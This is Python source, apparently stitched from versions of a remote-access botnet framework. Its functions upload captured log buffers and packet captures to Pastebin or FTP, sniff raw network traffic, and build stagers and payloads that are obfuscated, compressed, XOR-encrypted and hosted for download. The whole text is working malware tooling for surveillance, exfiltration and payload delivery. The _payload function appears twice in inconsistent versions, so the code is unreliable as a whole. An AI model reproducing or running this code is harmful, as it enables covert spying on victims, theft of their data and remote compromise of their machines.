def logger(mode='ftp'):
"""
Upload the log to Pastebin or FTP server at a regular interval
`Optional`
:param str mode: ftp, pastebin
"""
try:
while True:
if globals()['_buffer'].tell() > max_bytes:
try:
result = util.pastebin(globals(
)['_buffer']) if 'ftp' not in mode else util.ftp(
globals()['_buffer'])
results.append(result)
globals()['_buffer'].reset()
except Exception as e:
util.log("{} error: {}".format(logger.__name__, str(e)))
elif globals()['_abort']:
break
else:
time.sleep(5)
except Exception as e:
util.log("{} error: {}".format(logger.__name__, str(e)))
def _stager(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Stager", color='reset', style='bright')
assert 'url' in kwargs, "missing keyword argument 'url'"
assert 'key' in kwargs, "missing keyword argument 'key'"
assert 'var' in kwargs, "missing keyword argument 'var'"
if options.encrypt:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'], key=kwargs['key'])
else:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])
if not os.path.isdir('modules/stagers'):
try:
os.mkdir('modules/stagers')
except OSError:
util.log("Permission denied: unable to make directory './modules/stagers/'")
if options.compress:
util.display("\tCompressing stager... ", color='reset', style='normal', end=',')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
output = generators.compress(stager)
__load__.set()
_update(stager, output, task='Compression')
stager = output
util.display("\tUploading stager... ", color='reset', style='normal', end=',')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
if options.pastebin:
assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
url = util.pastebin(stager, options.pastebin)
else:
dirs = ['modules/stagers','byob/modules/stagers','byob/byob/modules/stagers']
dirname = '.'
for d in dirs:
if os.path.isdir(d):
dirname = d
path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py' )
with open(path, 'w') as fp:
fp.write(stager)
s = 'http://{}:{}/{}'.format(options.host, int(options.port) + 1, urllib.pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'), '')))
s = urllib2.urlparse.urlsplit(s)
url = urllib2.urlparse.urlunsplit((s.scheme, s.netloc, os.path.normpath(s.path), s.query, s.fragment)).replace('\\','/')
__load__.set()
util.display("(hosting stager at: {})".format(url), color='reset', style='dim')
return url
def run(mode, seconds=30):
"""
Monitor the host network and capture packets
`Optional`
:param int seconds: duration in seconds (default: 30)
"""
try:
if mode not in ('pastebin', 'ftp'):
return "Error: invalid upload mode '%s'" % str(mode)
if not isinstance(seconds, int):
return "Error: keyword argument 'seconds' must be an integer"
sniffer_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW,
socket.htons(0x0003))
while time.clock() < seconds:
try:
recv_data = sniffer_socket.recv(2048)
recv_data, ip_bool = packetsniffer_eth_header(recv_data)
if ip_bool:
recv_data, ip_proto = packetsniffer_ip_header(recv_data)
if ip_proto == 6:
recv_data = packetsniffer_tcp_header(recv_data)
elif ip_proto == 17:
recv_data = packetsniffer_udp_header(recv_data)
except Exception as e:
util.log(str(e))
break
try:
sniffer_socket.close()
except:
pass
results[time.ctime()] = util.pastebin(
globals()['log']) if 'ftp' not in mode else util.ftp(
globals()['log'], filetype='.pcap')
except Exception as e:
util.log("{} error: {}".format(packetsniffer.func_name, str(e)))
def _payload(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=' ')
util.display("Payload", color='reset', style='bright')
assert 'var' in kwargs, "missing keyword argument 'var'"
assert 'modules' in kwargs, "missing keyword argument 'modules'"
assert 'imports' in kwargs, "missing keyword argument 'imports'"
# loader = '\n'.join((open('core/loader.py','r').read(), generators.loader(host=options.host, port=int(options.port)+2, packages=list(kwargs['hidden']))))
loader = open('core/loader.py', 'r').read()
test_imports = '\n'.join([
'import ' + i for i in list(kwargs['hidden'])
if i not in ['StringIO', '_winreg']
])
modules = '\n'.join(([
open(module, 'r').read().partition('# main')[2]
for module in kwargs['modules']
] + [
generators.main(
'Payload', **{
"host": options.host,
"port": options.port,
"pastebin": options.pastebin if options.pastebin else str()
}) + '_payload.run()'
]))
payload = '\n'.join((loader, test_imports, modules))
if not os.path.isdir('modules/payloads'):
try:
os.mkdir('modules/payloads')
except OSError:
util.log(
"Permission denied: unabled to make directory './modules/payloads/'"
)
if options.compress:
util.display("\tCompressing payload... ",
color='reset',
style='normal',
end=' ')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
output = generators.compress(payload)
__load__.set()
_update(payload, output, task='Compression')
payload = output
if options.encrypt:
assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
util.display("\tEncrypting payload... ".format(kwargs['key']),
color='reset',
style='normal',
end=' ')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
__load__.set()
_update(payload, output, task='Encryption')
payload = output
util.display("\tUploading payload... ",
color='reset',
style='normal',
end=' ')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
if options.pastebin:
assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
url = util.pastebin(payload, options.pastebin)
else:
dirs = [
'modules/payloads', 'byob/modules/payloads',
'byob/byob/modules/payloads'
]
dirname = '.'
for d in dirs:
if os.path.isdir(d):
dirname = d
path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
with open(path, 'w') as fp:
fp.write(payload)
s = 'http://{}:{}/{}'.format(
options.host,
int(options.port) + 1,
pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
'')))
s = urlparse.urlsplit(s)
url = urlparse.urlunsplit(
(s.scheme, s.netloc, os.path.normpath(s.path), s.query,
s.fragment)).replace('\\', '/')
__load__.set()
util.display("(hosting payload at: {})".format(url),
color='reset',
style='dim')
return url
def _payload(options, **kwargs):
util.display("\n[>]", color='green', style='bright', end=',')
util.display("Payload", color='reset', style='bright')
assert 'var' in kwargs, "missing keyword argument 'var'"
assert 'modules' in kwargs, "missing keyword argument 'modules'"
assert 'imports' in kwargs, "missing keyword argument 'imports'"
payload = '\n'.join(
list(kwargs['imports']) + [
open(module, 'r').read().partition('# main')[2]
for module in kwargs['modules']
]) + generators.main(
'Payload', **{
"host": options.host,
"port": options.port,
"pastebin": options.pastebin if options.pastebin else str()
}) + '_payload.run()'
if not os.path.isdir('modules/payloads'):
try:
os.mkdir('modules/payloads')
except OSError:
__logger__.debug(
"Permission denied: unabled to make directory './modules/payloads/'"
)
if options.obfuscate:
__load__ = threading.Event()
util.display("\tObfuscating payload... ",
color='reset',
style='normal',
end=',')
__spin__ = _spinner(__load__)
output = '\n'.join([
line
for line in generators.obfuscate(payload).rstrip().splitlines()
if '=jobs' not in line
])
__load__.set()
_update(payload, output, task='Obfuscation')
payload = output
if options.compress:
util.display("\tCompressing payload... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
output = generators.compress(payload)
__load__.set()
_update(payload, output, task='Compression')
payload = output
if options.encrypt:
assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
util.display("\tEncrypting payload... ".format(kwargs['key']),
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
output = generators.encrypt(payload, kwargs['key'])
__load__.set()
_update(payload, output, task='Encryption')
payload = output
util.display("\tUploading payload... ",
color='reset',
style='normal',
end=',')
__load__ = threading.Event()
__spin__ = _spinner(__load__)
if options.pastebin:
assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
url = util.pastebin(payload, api_dev_key=options.pastebin)
else:
dirs = [
'modules/payloads', 'byob/modules/payloads',
'byob/byob/modules/payloads'
]
dirname = '.'
for d in dirs:
if os.path.isdir(d):
dirname = d
path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
with file(path, 'w') as fp:
fp.write(payload)
s = 'http://{}:{}/{}'.format(
options.host,
int(options.port) + 1,
urllib.pathname2url(
path.replace(os.path.join(os.getcwd(), 'modules'), '')))
s = urllib2.urlparse.urlsplit(s)
url = urllib2.urlparse.urlunsplit(
(s.scheme, s.netloc, os.path.normpath(s.path), s.query,
s.fragment)).replace('\\', '/')
__load__.set()
util.display("(hosting payload at: {})".format(url),
color='reset',
style='dim')
return url